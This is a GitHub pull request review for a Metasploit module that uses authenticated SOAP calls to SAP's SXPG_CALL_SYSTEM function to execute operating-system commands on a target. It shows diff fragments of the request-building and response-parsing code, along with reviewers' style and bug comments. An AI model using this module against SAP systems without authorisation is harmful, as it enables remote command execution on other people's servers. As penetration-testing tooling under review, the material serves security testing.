SAP SOAP RFC SXPG_CALL_SYSTEM #1034

Merged
merged 2 commits into from Nov 20, 2012

2 participants

@nmonkee

This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands as configured in SM69.

@brandonprry brandonprry and 2 others commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+ 'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
+ 'License' => BSD_LICENSE
+ )
+ register_options(
+ [
+ OptString.new('CLIENT', [true, 'Client', nil]),
+ OptString.new('USERNAME', [true, 'Username', nil]),
+ OptString.new('PASSWORD', [true, 'Password', nil]),
+ OptString.new('CMD', [true, 'Command to be executed', nil]),
+ OptString.new('PARAM', [false, 'Additional parameters', nil]),
+ OptEnum.new('OS', [true, 'Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']]),
@brandonprry
brandonprry added a line comment Nov 9, 2012

trailing comma

@jvazquez-r7
jvazquez-r7 added a line comment Nov 14, 2012

If it can execute os commands it could be converted into an exploit

@nmonkee
nmonkee added a line comment Nov 14, 2012
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ data << '</n1:SXPG_CALL_SYSTEM>'
+ data << '</env:Body>'
+ data << '</env:Envelope>'
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
@brandonprry
brandonprry added a line comment Nov 9, 2012

trailing comma

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
+ }
+ }, 45)
+ if (res and res.code != 500 and res.code != 200)
@brandonprry
brandonprry added a line comment Nov 9, 2012

if res and res.code != 500 and res.code != 200

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ print_error("[SAP] #{ip}:#{rport} - something went wrong!")
+ return
+ else
+ success = true
+ print_status("[SAP] #{ip}:#{rport} - got response")
+ saptbl = Msf::Ui::Console::Table.new(
+ Msf::Ui::Console::Table::Style::Default,
+ 'Header' => "[SAP] SXPG_CALL_SYSTEM ",
+ 'Prefix' => "\n",
+ 'Postfix' => "\n",
+ 'Indent' => 1,
+ 'Columns' =>["Output",]
+ )
+ response = res.body
+ if response =~ /faultstring/
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
@brandonprry
brandonprry added a line comment Nov 9, 2012

.flatten? Are you expecting more than one fault string? If so, more appropriate ways of doing this exist.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ return
+ else
+ success = true
+ print_status("[SAP] #{ip}:#{rport} - got response")
+ saptbl = Msf::Ui::Console::Table.new(
+ Msf::Ui::Console::Table::Style::Default,
+ 'Header' => "[SAP] SXPG_CALL_SYSTEM ",
+ 'Prefix' => "\n",
+ 'Postfix' => "\n",
+ 'Indent' => 1,
+ 'Columns' =>["Output",]
+ )
+ response = res.body
+ if response =~ /faultstring/
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
@brandonprry
brandonprry added a line comment Nov 9, 2012

typo?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ )
+ response = res.body
+ if response =~ /faultstring/
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
+ print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+ return
+ end
+ if success == true
@brandonprry
brandonprry added a line comment Nov 9, 2012

if success

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
+ print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+ return
+ end
+ if success == true
+ print(saptbl.to_s)
+ end
+ if sucess == false
@brandonprry
brandonprry added a line comment Nov 9, 2012

typo

Also, if !success

Or if not success if you are feeling verbose

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
+ print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+ return
+ end
+ if success == true
+ print(saptbl.to_s)
+ end
+ if sucess == false
+ for i in 0..error.length-1
@brandonprry
brandonprry added a line comment Nov 9, 2012

0.upto(error.length-1) do | i|

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7

msftidy warnings should be deleted:

$ tools/msftidy.rb modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb 
sap_soap_rfc_sxpg_call_system.rb:9 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_call_system.rb:10 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_call_system.rb:12 - [ERROR] Unicode detected: "# Mariano Nu\xC3\xB1ez (the author of the Bizploit framework) helped me in my efforts\n"
sap_soap_rfc_sxpg_call_system.rb:14 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_call_system.rb:15 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_call_system.rb:26 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_call_system.rb:37 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_call_system.rb:48 - [WARNING] Spaces at EOL
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+# experience - a very cool guy. I'd also like to thank Chris John Riley,
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM',
@jvazquez-r7
jvazquez-r7 added a line comment Nov 14, 2012

Names should be a little more descriptive

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM',
+ 'Version' => '$Revision',
@jvazquez-r7
jvazquez-r7 added a line comment Nov 14, 2012

not needed anymore

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM',
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
@jvazquez-r7
jvazquez-r7 added a line comment Nov 14, 2012

no general references pls

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM',
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+ 'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
+ 'License' => BSD_LICENSE
@jvazquez-r7
jvazquez-r7 added a line comment Nov 14, 2012

Can MSF_LICENSE be used?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...uxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+ if (res and res.code != 500 and res.code != 200)
+ # to do - implement error handlers for each status code, 404, 301, etc.
+ print_error("[SAP] #{ip}:#{rport} - something went wrong!")
+ return
+ else
+ success = true
+ print_status("[SAP] #{ip}:#{rport} - got response")
+ saptbl = Msf::Ui::Console::Table.new(
+ Msf::Ui::Console::Table::Style::Default,
+ 'Header' => "[SAP] SXPG_CALL_SYSTEM ",
+ 'Prefix' => "\n",
+ 'Postfix' => "\n",
+ 'Indent' => 1,
+ 'Columns' =>["Output",]
+ )
+ response = res.body
@jvazquez-r7
jvazquez-r7 added a line comment Nov 14, 2012

res should be checked against nil before accessing it here I think

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework Nov 20, 2012
Merged

cleanup for sap_soap_rfc_sxpg_call_system.rb ref #1034 #2

@jvazquez-r7

Pull request with cleanup done to your repo, if you can test the cleanup version and if works, share pcap's and land it, I think we'll be ready to merge :)

Really thanks!

@jvazquez-r7

Awesome, looks good, merging!

@jvazquez-r7 jvazquez-r7 merged commit be66ccd into rapid7:master Nov 20, 2012

1 check failed

Details default The Travis build failed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment